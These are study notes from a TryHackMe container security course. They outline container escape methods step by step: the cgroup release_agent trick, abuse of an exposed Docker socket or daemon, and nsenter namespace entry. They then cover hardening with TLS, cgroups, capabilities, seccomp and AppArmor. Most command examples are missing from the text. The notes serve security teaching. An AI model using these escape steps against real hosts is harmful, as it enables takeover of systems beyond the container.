Container Security
Notes from the 'Container Security' module of TryHackMe
Container Vulnerabilities
Privileged Containers
Docker containers can be run in two modes -
User mode - interacts with the Host Operating System through Docker Engine
Privileged - interacts directly with the Host OS
If a container is running with privileged access to the OS, commands can effectively be executed as root on the host. You can view capabilities of the container by running capsh --print.
Given below is an exploit on a privileged container using the mount syscall -
Steps involved in the exploit -
Create a group to use the Linux kernel to write and execute the exploit.
The kernel uses
cgroupsto manage processes on the OSSince cgroups can be managed as root on the host, it can be mounted to
/tmp/cgrpon the containerFor the exploit to execute, we have to tell the kernel to run the code. Adding
1to/tmp/cgrp/x/notify_on_releasetells the kernel to execute something once the "cgroup" finishesFind out where the container's files are stored on the host and store it as a variable.
Print the location of the exploit on the host system into
release_agentso that the exploit will be executed by "cgroup" once it is released.Turn the exploit into a shell on the host.
Execute a command,
cat /home/user1/flag.txt > $host_path/flag.txt, to print the contents offlag.txtinto a file on the container.Make the exploit executable.
Create a process to store that into
/tmp/cgrp/x/cgroup.procsso that once the process is released, the contents will be executed.
Escaping via Exposed Docker Daemon
When interacting with the Docker Engine (by running commands such as docker run) it is done using a socket, unless the command is executed to a remote Docker host. Unix sockets use filesystem permissions, meaning that you will have to be a member of the docker group (or root) to run Docker commands.
The socket will be mounted on the container as adocker.sock file. You can search for the file using the find command. On Ubuntu systems, it will be located in the /var/run directory.
You can use the Docker daemon to create a new container and mount the host's filesystem into the container to indirectly gain access to the host's filesystem. This can be achieved by running the following command -
The command does the following -
Starts a new container with the host's file system mounted to
/mntin the new containerRuns the container interactively using
-itChanges the root directory of the container to
/mntTells the container to run
shto gain a shell and execute commands in the container
Remote Code Execution via Exposed Docker Daemon
Docker can also use TCP sockets to achieve IPC. It can be remotely administrated using tools such as Portainer or Jenkins to deploy containers for testing code. Docker Engine will listen on a port (2375 by default) when configured to be run remotely. This makes it easy to remotely access the container but it is difficult to do securely. You can find out if a device has docker remotely accessible by using nmap -
An exposed docker daemon can be interacted with by using curl.
Docker has to be used to send commands to a target. Add -H to switch to the target. You can run various commands like network, images, exec, run.
Abusing Namespaces
Sometimes, containers will share the same namespace as the host OS for communication between the container and host. This can be abused by using the nsenter command. The command allows you to execute or start processes and place them within the same namespace as another process.
You can abuse the fact that the container can see the /sbin/init process on the host to launch new commands such as a bash shell on the host. This can be done using the following command -
The command does the following -
Sets the target of the shell command as the namespace of the special system process (PID 1) to gain root
Sets the namespace to be mounted; If no file is specified, it will enter the mount namespace of the target process.
Allows you to share the same UTS (Unix Timesharing System) namespace as the target process, meaning the same hostname is used; Mismatching hostnames can cause connection issues.
Enters the IPC (Inter-process communication) namespace of the process which is important as it means that memory can be shared
Enters the network namespace to allow you to interact with network-related features of the system; For example, the network interfaces can be used to open a new connection like a stable reverse shell on the host.
bash will execute in the same namespace (and privileges) of the kernel.
Container Hardening
Protecting the Docker Daemon
Make sure to use secure communication and authentication methods to prevent unauthorised access to the Docker daemon.
SSH
You can use SSH authentication to interact with other devices running Docker. Docker uses contexts which can be thought of as profiles. Profiles allow developers to save and swap between configurations for other devices. You must have SSH access to the remote device and the user account on the remote device must have permission to execute Docker commands.
Use the following command to create a Docker context on your device -
Run the following command to switch to the created context -
TLS Encryption
The Docker daemon can also be interacted with using HTTP/S. Docker will only accept remote commands from devices that have been signed against the device you wish to execute Docker commands on remotely when configured in TLS mode.
To configure TLS mode run the following command on the server that you are issuing commands to -
Run the following command on the client that you are issuing commands from -
Implementing Control Groups
Control groups (or cgroups) are a feature of the Linux kernel that facilitates restricting and prioritising the number of system resources a process can utilise. It improves system stability and allows administrators to track the use of system resources better.
For Docker, implementing cgroups helps achieve isolation and stability. This behaviour is not enabled by default and must be enabled when starting a container. Some examples of setting limits to resources for a container -
Use the following command to update the setting once the container is running -
You can view information about a container using the following command -
Read more about cgroups at -
Preventing "Over-Privileged" Containers
Capabilities are a security feature of Linux that determines what processes can and cannot do on a granular level. They allow you to fine-tune what privileges a process has. Some capabilities are -
CAP_NET_BIND_SERVICE - allows services to bind to ports, specifically those under 1024, which usually requires root privileges
CAP_SYS_ADMIN - provides a variety of admin privileges such as mounting/unmounting file systems, changing network settings and performing system reboots/shutdowns
CAP_SYS_RESOURCE - allows a process to modify the maximum limit of resources available
Privileged containers have full root access and therefore it is better to assign capabilities to containers individually instead of running containers with the --privileged flag. The following command removes all other capabilities and adds the NET_BIND_SERVICE capability to the webserver container -
You can determine what capabilites are assigned to a process by using the capsh --print command. Read more about capabilities at -
Seccomp and AppArmor
It is an important security feature of Linux that restricts the actions that a program can do. It allows the user to create and enforce a list of rules of what actions (system calls) that application can make. For example, it can allow the application to make a system call to read a file but not allow it to make a system call to open a network connection. This reduces an attacker's ability to execute malicious commands whilst maintaining the application's functionality.
An example Seccomp profile for a web server that allows for files to be read and written to but does not allow for execution (execve, execveat).-
Apply a profile to a container -
Resources -
It is a similar security feature as Seccomp in Linux. It works differently, however, as it is not included in the application but in the OS. It is a Mandatory Access Control (MAC) system that determines the actions a process can execute based on a set of rules at the OS level.
Given below is a profile that makes sure that a container has the following capabilities:
It can read files located in
/var/www/,/etc/apache2/mime.typesand/run/apache2.It can read and write to
/var/log/apache2.It can bind to a TCP socket for port 80 but not other ports or protocols such as UDP.
It cannot read from directories such as
/bin,/lib,/usr.
To apply an AppArmor profile to a container, we need to -
Ensure that it is installed on the system using the command -
sudo aa-status.Create a profile.
Load the profile into AppArmor.
Run the container with the created profile.
Import the profile into AppArmor -
Apply it to the container at runtime -
Resources -
Reviewing Docker Images
You should analyse the code for Dockerfiles before using them to check for vulnerabilities or malicious actions. You can use Dive for this. It is a tool to reverse engineer Docker images by inspecting what is executed and changed at each layer during the build process.
Compliance and Benchmarking
Using Docker scout to scan an nginx image for known vulnerabilities -
Using Grype to scan docker image for vulnerabilties -
Using Grype to scan exported container filesystem (exported using docker image save) -
Last updated

